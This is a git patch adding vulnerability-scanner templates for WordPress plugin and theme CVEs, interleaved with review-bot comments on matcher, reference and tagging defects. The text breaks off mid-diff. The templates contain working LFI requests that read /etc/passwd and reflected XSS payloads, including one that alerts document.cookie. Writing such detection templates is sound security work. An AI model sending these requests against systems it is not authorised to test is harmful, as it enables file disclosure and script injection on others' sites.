From 80c791830b7a5932836189b3ac24ed22b55edef8 Mon Sep 17 00:00:00 2001 
From: daffainfo
Date: Fri, 16 Jul 2021 08:28:45 +0700
Subject: [PATCH] Adding some new templates
---
CVE-2011-1669.yaml | 27 ++++++++++++++++++++++
CVE-2011-4618.yaml | 3 ++-
CVE-2011-4624.yaml | 3 ++-
CVE-2011-4926.yaml | 3 ++-
CVE-2011-5106.yaml | 30 +++++++++++++++++++++++++
CVE-2011-5107.yaml | 3 ++-
CVE-2011-5179.yaml | 3 ++-
CVE-2011-5181.yaml | 5 +++--
CVE-2011-5265.yaml | 3 ++-
CVE-2012-0901.yaml | 3 ++-
CVE-2012-2371.yaml | 3 ++-
CVE-2012-4273.yaml | 30 +++++++++++++++++++++++++
CVE-2012-4768.yaml | 30 +++++++++++++++++++++++++
CVE-2012-5913.yaml | 3 ++-
CVE-2013-4117.yaml | 30 +++++++++++++++++++++++++
CVE-2013-4625.yaml | 30 +++++++++++++++++++++++++
CVE-2014-4513.yaml | 30 +++++++++++++++++++++++++
CVE-2015-1000012.yaml | 25 +++++++++++++++++++++
CVE-2015-9480.yaml | 25 +++++++++++++++++++++
CVE-2016-10956.yaml | 25 +++++++++++++++++++++
CVE-2019-19134.yaml | 30 +++++++++++++++++++++++++
CVE-2019-9618.yaml | 27 ++++++++++++++++++++++
CVE-2020-12054.yaml | 30 +++++++++++++++++++++++++
CVE-2020-17362.yaml | 30 +++++++++++++++++++++++++
CVE-2021-24298.yaml | 30 +++++++++++++++++++++++++
CVE-2021-24320.yaml | 30 +++++++++++++++++++++++++
CVE-2021-24335.yaml | 30 +++++++++++++++++++++++++
CVE-2021-24389.yaml | 30 +++++++++++++++++++++++++
phpinfo.yaml | 47 +++++++++++++++++++++++++++++++++++++++
wp-custom-tables-xss.yaml | 30 +++++++++++++++++++++++++
wp-flagem-xss.yaml | 29 ++++++++++++++++++++++++
wp-nextgen-xss.yaml | 29 ++++++++++++++++++++++++
wp-slideshow-xss.yaml | 32 ++++++++++++++++++++++++++
33 files changed, 707 insertions(+), 11 deletions(-)
create mode 100644 CVE-2011-1669.yaml
create mode 100644 CVE-2011-5106.yaml
create mode 100644 CVE-2012-4273.yaml
create mode 100644 CVE-2012-4768.yaml
create mode 100644 CVE-2013-4117.yaml
create mode 100644 CVE-2013-4625.yaml
create mode 100644 CVE-2014-4513.yaml
create mode 100644 CVE-2015-1000012.yaml
create mode 100644 CVE-2015-9480.yaml
create mode 100644 CVE-2016-10956.yaml
create mode 100644 
CVE-2019-19134.yaml create mode 100644 CVE-2019-9618.yaml create mode 100644 CVE-2020-12054.yaml create mode 100644 CVE-2020-17362.yaml create mode 100644 CVE-2021-24298.yaml create mode 100644 CVE-2021-24320.yaml create mode 100644 CVE-2021-24335.yaml create mode 100644 CVE-2021-24389.yaml create mode 100644 phpinfo.yaml create mode 100644 wp-custom-tables-xss.yaml create mode 100644 wp-flagem-xss.yaml create mode 100644 wp-nextgen-xss.yaml create mode 100644 wp-slideshow-xss.yaml diff --git a/CVE-2011-1669.yaml b/CVE-2011-1669.yaml new file mode 100644 index 0000000..1a448f5 --- /dev/null +++ b/CVE-2011-1669.yaml @@ -0,0 +1,27 @@ +id: CVE-2011-1669 + +info: + name: WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI) + author: daffainfo + severity: high + description: Directory traversal vulnerability in wp-download.php in the WP Custom Pages module 0.5.0.1 for WordPress allows remote attackers to read arbitrary files via ..%2F (encoded dot dot) sequences in the url parameter. + reference: | + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669 + - https://www.exploit-db.com/exploits/17119 + tags: cve,cve2011,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/CVE-2011-4618.yaml b/CVE-2011-4618.yaml index 6593682..e043051 100644 --- a/CVE-2011-4618.yaml +++ b/CVE-2011-4618.yaml 
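Review bot: `reference: |` under `info:` in CVE-2011-1669 turns the two URLs into one literal-block string whose lines start with `- `, not a YAML sequence, so any consumer that reads `reference` as a list or as a single URL gets a string with embedded dashes and newlines. Write it as a real sequence: `reference:` / `  - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1669` / `  - https://www.exploit-db.com/exploits/17119`. The same block-scalar form is used in CVE-2015-1000012, CVE-2015-9480 and CVE-2019-9618 in this patch.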
@@ -4,6 +4,7 @@ info: name: Advanced Text Widget < 2.0.2 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in advancedtext.php in Advanced Text Widget plugin before 2.0.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4618 tags: cve,cve2011,wordpress,xss,wp-plugin @@ -26,4 +27,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/CVE-2011-4624.yaml b/CVE-2011-4624.yaml index 5ad804b..6b6eae3 100644 --- a/CVE-2011-4624.yaml +++ b/CVE-2011-4624.yaml @@ -4,6 +4,7 @@ info: name: GRAND FlAGallery 1.57 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in facebook.php in the GRAND FlAGallery plugin (flash-album-gallery) before 1.57 for WordPress allows remote attackers to inject arbitrary web script or HTML via the i parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4624 tags: cve,cve2011,wordpress,xss,wp-plugin @@ -26,4 +27,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/CVE-2011-4926.yaml b/CVE-2011-4926.yaml index bc278b7..17178b7 100644 --- a/CVE-2011-4926.yaml +++ b/CVE-2011-4926.yaml @@ -4,6 +4,7 @@ info: name: Adminimize 1.7.22 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-4926 tags: cve,cve2011,wordpress,xss,wp-plugin @@ -26,4 +27,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 
diff --git a/CVE-2011-5106.yaml b/CVE-2011-5106.yaml new file mode 100644 index 0000000..a17da7f --- /dev/null +++ b/CVE-2011-5106.yaml @@ -0,0 +1,30 @@ +id: CVE-2011-5106 + +info: + name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5106 + tags: cve,cve2011,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2011-5107.yaml b/CVE-2011-5107.yaml index d62a889..c01e565 100644 --- a/CVE-2011-5107.yaml +++ b/CVE-2011-5107.yaml @@ -4,6 +4,7 @@ info: name: Alert Before Your Post <= 0.1.1 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in post_alert.php in Alert Before Your Post plugin, possibly 0.1.1 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the name parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5107 tags: cve,cve2011,wordpress,xss,wp-plugin @@ -26,4 +27,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/CVE-2011-5179.yaml b/CVE-2011-5179.yaml index ba0bd6e..9c92b5c 100644 --- a/CVE-2011-5179.yaml +++ b/CVE-2011-5179.yaml 
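Review bot: The body matcher in CVE-2011-5106 has a single entry `- ""`, an empty string, and under `matchers-condition: and` that leaves the template matching any `text/html` response with status 200, so it cannot tell a reflected payload from a normal page. If the empty value is a rendering loss of the real string rather than the committed content the point is moot, but as shown the `words` entry should be the decoded marker that the request path sends (`<script>alert(123)</script>`) so the match depends on the reflection. The same `- ""` appears in CVE-2012-4273, CVE-2012-4768, CVE-2013-4117, CVE-2013-4625, CVE-2014-4513, CVE-2020-12054, CVE-2020-17362, CVE-2021-24298, CVE-2021-24320, CVE-2021-24335, CVE-2021-24389, wp-custom-tables-xss, wp-flagem-xss, wp-nextgen-xss and wp-slideshow-xss.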
@@ -4,6 +4,7 @@ info: name: Skysa App Bar 1.04 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in skysa-official/skysa.php in Skysa App Bar Integration plugin, possibly before 1.04, for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5179 tags: cve,cve2011,wordpress,xss,wp-plugin @@ -26,4 +27,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/CVE-2011-5181.yaml b/CVE-2011-5181.yaml index 1ee7cb8..41812c7 100644 --- a/CVE-2011-5181.yaml +++ b/CVE-2011-5181.yaml @@ -1,9 +1,10 @@ id: CVE-2011-5181 info: - name: ClickDesk Live Support - Live Chat 2.0 - Reflected Cross-Site Scripting (XSS) + name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181 tags: cve,cve2011,wordpress,xss,wp-plugin @@ -26,4 +27,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/CVE-2011-5265.yaml b/CVE-2011-5265.yaml index 109499f..2ed7592 100644 --- a/CVE-2011-5265.yaml +++ b/CVE-2011-5265.yaml @@ -4,6 +4,7 @@ info: name: Featurific For WordPress 1.6.2 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in cached_image.php in the Featurific For WordPress plugin 1.6.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the snum parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5265 tags: cve,cve2011,wordpress,xss,wp-plugin 
@@ -26,4 +27,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/CVE-2012-0901.yaml b/CVE-2012-0901.yaml index 6f20b82..fb82bdf 100644 --- a/CVE-2012-0901.yaml +++ b/CVE-2012-0901.yaml @@ -4,6 +4,7 @@ info: name: YouSayToo auto-publishing 1.0 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in yousaytoo.php in YouSayToo auto-publishing plugin 1.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the submit parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2012-0901 tags: cve,cve2012,wordpress,xss,wp-plugin @@ -26,4 +27,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/CVE-2012-2371.yaml b/CVE-2012-2371.yaml index e9bf01a..61a2207 100644 --- a/CVE-2012-2371.yaml +++ b/CVE-2012-2371.yaml @@ -4,6 +4,7 @@ info: name: WP-FaceThumb 0.1 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in index.php in the WP-FaceThumb plugin 0.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the pagination_wp_facethumb parameter. reference: https://nvd.nist.gov/vuln/detail/CVE-2012-2371 tags: cve,cve2012,wordpress,xss,wp-plugin @@ -26,4 +27,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/CVE-2012-4273.yaml b/CVE-2012-4273.yaml new file mode 100644 index 0000000..db31bfa --- /dev/null +++ b/CVE-2012-4273.yaml 
@@ -0,0 +1,30 @@ +id: CVE-2012-4273 + +info: + name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4273 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2012-4768.yaml b/CVE-2012-4768.yaml new file mode 100644 index 0000000..e89963b --- /dev/null +++ b/CVE-2012-4768.yaml @@ -0,0 +1,30 @@ +id: CVE-2012-4768 + +info: + name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI. + reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4768 + tags: cve,cve2012,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/?dlsearch=%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2012-5913.yaml b/CVE-2012-5913.yaml index 23512f1..be685d2 100644 --- a/CVE-2012-5913.yaml +++ b/CVE-2012-5913.yaml 
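Review bot: CVE-2012-4768 sends `{{BaseURL}}/?dlsearch=…` to the site root and nothing in the request or in the matchers ties the response to the Download Monitor plugin, so any site that echoes an unknown query parameter unescaped will match and be reported under this CVE. Either add a matcher on a string that only the plugin emits, or state in `description` that the check is a generic reflection test and the CVE attribution is presumptive. CVE-2020-12054 and CVE-2020-17362, which both send `{{BaseURL}}/?s=…`, have the same shape and the same attribution problem with each other.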
@@ -4,6 +4,7 @@ info: name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting (XSS) author: daffainfo severity: medium + description: Cross-site scripting (XSS) vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php. reference: https://nvd.nist.gov/vuln/detail/CVE-2012-5913 tags: cve,cve2012,wordpress,xss,wp-plugin @@ -26,4 +27,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/CVE-2013-4117.yaml b/CVE-2013-4117.yaml new file mode 100644 index 0000000..f30a61b --- /dev/null +++ b/CVE-2013-4117.yaml @@ -0,0 +1,30 @@ +id: CVE-2013-4117 + +info: + name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4117 + tags: cve,cve2013,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%22%3E%3Cscript%3Ealert%28123%29%3C%2Fscript%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2013-4625.yaml b/CVE-2013-4625.yaml new file mode 100644 index 0000000..4b9f913 --- /dev/null +++ b/CVE-2013-4625.yaml 
@@ -0,0 +1,30 @@ +id: CVE-2013-4625 + +info: + name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625 + tags: cve,cve2013,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3Cscript%3Ealert%28123%29;%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2014-4513.yaml b/CVE-2014-4513.yaml new file mode 100644 index 0000000..dfcae28 --- /dev/null +++ b/CVE-2014-4513.yaml 
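Review bot: The request sends `remove=1` alongside the `package` payload to `installer.cleanup.php`; judging by the file and parameter names, that request may trigger the plugin's cleanup action on the target, which is a side effect a reflected-XSS check does not need. If `remove=1` is not required to reach the reflection, drop it; if it is, say so in `description` so operators know the template is not read-only. This is inferred from the names alone and should be confirmed against the plugin.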
@@ -0,0 +1,30 @@ +id: CVE-2014-4513 + +info: + name: ActiveHelper LiveHelp Server 3.1.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: Multiple cross-site scripting (XSS) vulnerabilities in server/offline.php in the ActiveHelper LiveHelp Live Chat plugin 3.1.0 and earlier for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) MESSAGE, (2) EMAIL, or (3) NAME parameter. + reference: https://nvd.nist.gov/vuln/detail/CVE-2014-4513 + tags: cve,cve2014,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%22%3E%3C/textarea%3E%3Cscript%3Ealert%28123%29%3C/script%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2015-1000012.yaml b/CVE-2015-1000012.yaml new file mode 100644 index 0000000..eb9030a --- /dev/null +++ b/CVE-2015-1000012.yaml @@ -0,0 +1,25 @@ +id: CVE-2015-1000012 + +info: + name: MyPixs <= 0.3 - Unauthenticated Local File Inclusion (LFI) + author: daffainfo + severity: high + reference: | + - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012 + tags: cve,cve2015,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[0*]:0:0" + part: body + - type: status + status: + - 200 
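Review bot: CVE-2015-1000012's regex `root:[0*]:0:0` accepts only `0` or `*` in the password field, so the usual shadowed form `root:x:0:0` does not match and the template stays silent on hosts where the read actually succeeds; CVE-2011-1669 and CVE-2019-9618 in this same patch use `root:[x*]:0:0`, which should be used here and in CVE-2015-9480 and CVE-2016-10956. Separately, CVE-2014-4513's path puts `alert(document.cookie)` in the EMAIL and NAME parameters while every other template in the patch uses the neutral `alert(123)` marker, and it ends with a stray `&`; one marker keeps the body matcher consistent across the three parameters.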
diff --git a/CVE-2015-9480.yaml b/CVE-2015-9480.yaml new file mode 100644 index 0000000..92c272b --- /dev/null +++ b/CVE-2015-9480.yaml @@ -0,0 +1,25 @@ +id: CVE-2015-9480 + +info: + name: WordPress Plugin RobotCPA 5 - Directory Traversal + author: daffainfo + severity: high + reference: | + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-9480 + - https://www.exploit-db.com/exploits/37252 + tags: cve,cve2015,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[0*]:0:0" + part: body + - type: status + status: + - 200 diff --git a/CVE-2016-10956.yaml b/CVE-2016-10956.yaml new file mode 100644 index 0000000..4c48c18 --- /dev/null +++ b/CVE-2016-10956.yaml @@ -0,0 +1,25 @@ +id: CVE-2016-10956 + +info: + name: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI) + author: daffainfo + severity: high + description: The mail-masta plugin 1.0 for WordPress has local file inclusion in count_of_send.php and csvexport.php. + reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10956 + tags: cve,cve2016,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd" + - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[0*]:0:0" + part: body + - type: status + status: + - 200 diff --git a/CVE-2019-19134.yaml b/CVE-2019-19134.yaml new file mode 100644 index 0000000..5aeed95 --- /dev/null +++ b/CVE-2019-19134.yaml 
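Review bot: CVE-2015-9480 has no `description:` although this patch adds one to every edited template, so a reader gets nothing beyond the name `Directory Traversal` and two links; a one-line description naming the vulnerable file and parameter, which the path already shows as `f.php` and `l`, would bring it in line with the rest. CVE-2015-1000012, wp-flagem-xss, wp-nextgen-xss and wp-slideshow-xss are missing `description:` as well.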
@@ -0,0 +1,30 @@ +id: CVE-2019-19134 + +info: + name: Hero Maps Premium < 2.2.3 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The Hero Maps Premium plugin 2.2.1 and prior for WordPress is prone to unauthenticated XSS via the views/dashboard/index.php p parameter because it fails to sufficiently sanitize user-supplied input - https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985 + reference: https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01 + tags: cve,cve2019,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3E%3Csvg//onload=%22alert(123)%22%3E' + + matchers-condition: and + matchers: + - type: word + words: + - 'foo">' + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2019-9618.yaml b/CVE-2019-9618.yaml new file mode 100644 index 0000000..a04b19c --- /dev/null +++ b/CVE-2019-9618.yaml @@ -0,0 +1,27 @@ +id: CVE-2019-9618 + +info: + name: WordPress Plugin GraceMedia Media Player 1.0 - Local File Inclusion (LFI) + author: daffainfo + severity: high + description: The GraceMedia Media Player plugin 1.0 for WordPress allows Local File Inclusion via the cfg parameter. + reference: | + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9618 + - https://seclists.org/fulldisclosure/2019/Mar/26 + tags: cve,cve2019,wordpress,wp-plugin,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 diff --git a/CVE-2020-12054.yaml b/CVE-2020-12054.yaml new file mode 100644 index 0000000..e937c8a --- /dev/null 
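Review bot: CVE-2019-19134's `description` ends with the wpscan link `…/24b83ce5-e3b8-4262-b087-a2dfec014985`, which is the MyPixs advisory cited by CVE-2015-1000012 in this patch, while its own `reference` is `…/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01`; the trailing URL looks like a copy-paste leftover and should be removed from the description. The `name` also says `< 2.2.3` while the description says `2.2.1 and prior`, so one of the two version bounds is wrong.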
+++ b/CVE-2020-12054.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-12054 + +info: + name: Catch Breadcrumb < 1.5.7 - Unauthenticated Reflected XSS + author: daffainfo + severity: medium + description: The Catch Breadcrumb plugin before 1.5.4 for WordPress allows Reflected XSS via the s parameter (a search query). + reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4 + tags: cve,cve2020,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/?s=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2020-17362.yaml b/CVE-2020-17362.yaml new file mode 100644 index 0000000..2e265da --- /dev/null +++ b/CVE-2020-17362.yaml @@ -0,0 +1,30 @@ +id: CVE-2020-17362 + +info: + name: Nova Lite < 1.3.9 - Unauthenticated Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: search.php in the Nova Lite theme before 1.3.9 for WordPress allows Reflected XSS. + reference: https://wpscan.com/vulnerability/30a83491-2f59-4c41-98bd-a9e6e5a609d4 + tags: cve,cve2020,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/?s=%3Cimg%20src%20onerror=alert(123)%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2021-24298.yaml b/CVE-2021-24298.yaml new file mode 100644 index 0000000..b57d43a --- /dev/null +++ b/CVE-2021-24298.yaml 
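Review bot: CVE-2020-12054's `name` says `< 1.5.7` but its `description` says `before 1.5.4`, so the affected range is stated two different ways. CVE-2020-17362's `reference` is the same wpscan URL (`…/30a83491-2f59-4c41-98bd-a9e6e5a609d4`) as CVE-2020-12054, i.e. the Catch Breadcrumb advisory; it should point at an advisory for CVE-2020-17362 itself, for example `https://nvd.nist.gov/vuln/detail/CVE-2020-17362` in the style the other templates use.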
@@ -0,0 +1,30 @@ +id: CVE-2021-24298 + +info: + name: Simple Giveaways < 2.36.2 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The method and share GET parameters of the Giveaway pages were not sanitised, validated or escaped before being output back in the pages, thus leading to reflected XSS + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24298 + tags: cve,cve2021,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/giveaway/mygiveaways/?share=%3Cscript%3Ealert(123)%3C/script%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2021-24320.yaml b/CVE-2021-24320.yaml new file mode 100644 index 0000000..42d9616 --- /dev/null +++ b/CVE-2021-24320.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-24320 + +info: + name: Bello WordPress Theme < 1.6.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The Bello - Directory & Listing WordPress theme before 1.6.0 did not properly sanitise and escape its listing_list_view, bt_bb_listing_field_my_lat, bt_bb_listing_field_my_lng, bt_bb_listing_field_distance_value, bt_bb_listing_field_my_lat_default, bt_bb_listing_field_keyword, bt_bb_listing_field_location_autocomplete, bt_bb_listing_field_price_range_from and bt_bb_listing_field_price_range_to parameter in ints listing page, leading to reflected Cross-Site Scripting issues. + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24320 + tags: cve,cve2021,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/listing/?listing_list_view=standard13%22%3E%3Cimg%20src%3Dx%20onerror%3D%28alert%29%28123%29%3B%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 
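Review bot: CVE-2021-24320 is a theme (`Bello - Directory & Listing WordPress theme`, per its own description) but is tagged `wp-plugin`; CVE-2021-24335 (Car Repair Services theme) and CVE-2020-17362 (Nova Lite theme) have the same mismatch, so tag-based filtering misclassifies all three. Use the repository's theme tag instead (`wp-theme`, if that is the convention in use). Also `ints listing page` in the CVE-2021-24320 description should read `its listing page`.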
diff --git a/CVE-2021-24335.yaml b/CVE-2021-24335.yaml new file mode 100644 index 0000000..ea7b581 --- /dev/null +++ b/CVE-2021-24335.yaml @@ -0,0 +1,30 @@ +id: CVE-2021-24335 + +info: + name: Car Repair Services < 4.0 - Reflected Cross-Site Scripting (XSS) + author: daffainfo + severity: medium + description: The Car Repair Services & Auto Mechanic WordPress theme before 4.0 did not properly sanitise its serviceestimatekey search parameter before outputting it back in the page, leading to a reflected Cross-Site Scripting issue + reference: https://nvd.nist.gov/vuln/detail/CVE-2021-24335 + tags: cve,cve2021,wordpress,xss,wp-plugin + +requests: + - method: GET + path: + - '{{BaseURL}}/car1/estimateresult/result?s=&serviceestimatekey=%3Cimg%20src%3Dx%20onerror%3Dalert%28123%29%3B%3E' + + matchers-condition: and + matchers: + - type: word + words: + - "" + part: body + + - type: word + part: header + words: + - text/html + + - type: status + status: + - 200 diff --git a/CVE-2021-24389.yaml b/CVE-2021-24389.yaml new 